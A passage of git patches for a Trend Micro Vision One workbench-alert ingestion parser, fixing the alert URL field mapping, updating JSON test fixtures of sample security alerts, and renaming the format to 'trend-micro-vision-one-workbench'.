Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json @@ -5,6 +5,7 @@ "expected": { "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}", "event": { + "action": "File quarantined", "category": [ "intrusion_detection" ], From 776dc1e17b4fd4090e082ba91cd775faf9b86f8e Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Mon, 2 Dec 2024 09:55:43 +0100 Subject: [PATCH 83/84] fix(TrendMicroVisionOne): fix workbench alert url --- Trend Micro/trend-micro-vision-one/ingest/parser.yml | 2 +- .../tests/test_eicar_test_file_detection.json | 3 ++- .../tests/test_information_gathering.json | 3 ++- .../tests/test_internal_network_scanner.json | 3 ++- Trend Micro/trend-micro-vision-one/tests/test_process.json | 3 ++- .../trend-micro-vision-one/tests/test_project_injection.json | 3 ++- Trend Micro/trend-micro-vision-one/tests/test_registry.json | 3 ++- .../trend-micro-vision-one/tests/test_service_abuse.json | 3 ++- 8 files changed, 15 insertions(+), 8 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index 988fe612e..d672e2a64 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -36,7 +36,7 @@ stages: rule.name: "{{parsed_event.message.model}}" rule.id: "{{parsed_event.message.model.modelId}}" - event.url: "{{parsed_event.message.model.workbenchLink}}" + event.url: "{{parsed_event.message.workbenchLink}}" event.action: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'actResult') | first).value }}" - set: diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json index e503353f1..53813871b 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json @@ -13,7 +13,8 @@ "reason": "Eicar Test File Detection", "type": [ "info" - ] + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" }, "@timestamp": "2024-11-26T16:51:29Z", "file": { diff --git a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json index 4d60422b4..edbe26be4 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json @@ -12,7 +12,8 @@ "reason": "Potential Information Gathering", "type": [ "info" - ] + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" }, "@timestamp": "2024-11-26T16:48:06Z", "host": { diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json index 5b8dbfc95..d15f28c6f 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json @@ -12,7 +12,8 @@ "reason": "Internal Network Scanner", "type": [ "info" - ] + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509" }, "@timestamp": "2024-07-23T14:46:11Z", "file": { diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index 9a41ea92c..3c77d1afd 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -12,7 +12,8 @@ "reason": "Credential Dumping via Mimikatz", "type": [ "info" - ] + ], + "url": "https://THE_WORKBENCH_URL" }, "@timestamp": "2022-09-06T02:49:30Z", "file": { diff --git a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json index dbeed8e8e..a95ac7fc8 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json @@ -12,7 +12,8 @@ "reason": "Process Injection from Windows Temporary Location to System32", "type": [ "info" - ] + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3" }, "@timestamp": "2024-07-23T07:49:48Z", "host": { diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index 61b294270..6598afe24 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -12,7 +12,8 @@ "reason": "Privilege Escalation via UAC Bypass", "type": [ "info" - ] + ], + "url": "https://THE_WORKBENCH_URL" }, "@timestamp": "2022-09-06T02:49:31Z", "container": { diff --git a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json index e3283fe41..a9a7d3d7c 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json @@ -12,7 +12,8 @@ "reason": "Possible Web Service Abuse", "type": [ "info" - ] + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" }, "@timestamp": "2024-11-26T16:45:28Z", "action": { From f27eab62f8c6c3b3437d951d4e9608aef80ffa05 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Mon, 2 Dec 2024 10:00:00 +0100 Subject: [PATCH 84/84] refactor(TrendMicro): change the name of the format --- .../CHANGELOG.md | 0 .../_meta/fields.yml | 0 .../_meta/logo.png | Bin .../_meta/manifest.yml | 5 +++-- .../_meta/smart-descriptions.json | 0 .../ingest/parser.yml | 2 +- .../tests/test_eicar_test_file_detection.json | 0 .../tests/test_information_gathering.json | 0 .../tests/test_internal_network_scanner.json | 0 .../tests/test_process.json | 0 .../tests/test_project_injection.json | 0 .../tests/test_registry.json | 0 .../tests/test_service_abuse.json | 0 13 files changed, 4 insertions(+), 3 deletions(-) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/CHANGELOG.md (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/fields.yml (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/logo.png (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/manifest.yml (73%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/smart-descriptions.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/ingest/parser.yml (99%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_eicar_test_file_detection.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_information_gathering.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_internal_network_scanner.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_process.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_project_injection.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_registry.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_service_abuse.json (100%) diff --git a/Trend Micro/trend-micro-vision-one/CHANGELOG.md b/Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md similarity index 100% rename from Trend Micro/trend-micro-vision-one/CHANGELOG.md rename to Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md diff --git a/Trend Micro/trend-micro-vision-one/_meta/fields.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml similarity index 100% rename from Trend Micro/trend-micro-vision-one/_meta/fields.yml rename to Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml diff --git a/Trend Micro/trend-micro-vision-one/_meta/logo.png b/Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png similarity index 100% rename from Trend Micro/trend-micro-vision-one/_meta/logo.png rename to Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml similarity index 73% rename from Trend Micro/trend-micro-vision-one/_meta/manifest.yml rename to Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml index da8360194..014352012 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml +++ b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml @@ -1,11 +1,12 @@ uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05 automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6 -name: Trend Micro Vision One [BETA] -slug: trend-micro-vision-one +name: Trend Micro Vision One Workbench Alerts [BETA] +slug: trend-micro-vision-one-workbench-alerts description: >- Trend Micro Vision One is an extended detection and response (XDR) platform that enhances threat detection, investigation, and response across multiple security layers. It provides a centralized view for improved security posture and faster threat remediation. + This intake format will ingest Workbench Alerts from Trend Micro Vision One. data_sources: Process monitoring: diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json similarity index 100% rename from Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json rename to Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml similarity index 99% rename from Trend Micro/trend-micro-vision-one/ingest/parser.yml rename to Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml index d672e2a64..f5859582b 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml @@ -1,4 +1,4 @@ -name: trend-micro-vision-one +name: trend-micro-vision-one-workbench ignored_values: [] pipeline: - name: parsed_event diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json similarity index 100% rename from Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json diff --git a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json similarity index 100% rename from Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json similarity index 100% rename from Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json similarity index 100% rename from Trend Micro/trend-micro-vision-one/tests/test_process.json rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json diff --git a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json similarity index 100% rename from Trend Micro/trend-micro-vision-one/tests/test_project_injection.json rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json similarity index 100% rename from Trend Micro/trend-micro-vision-one/tests/test_registry.json rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json diff --git a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json similarity index 100% rename from Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json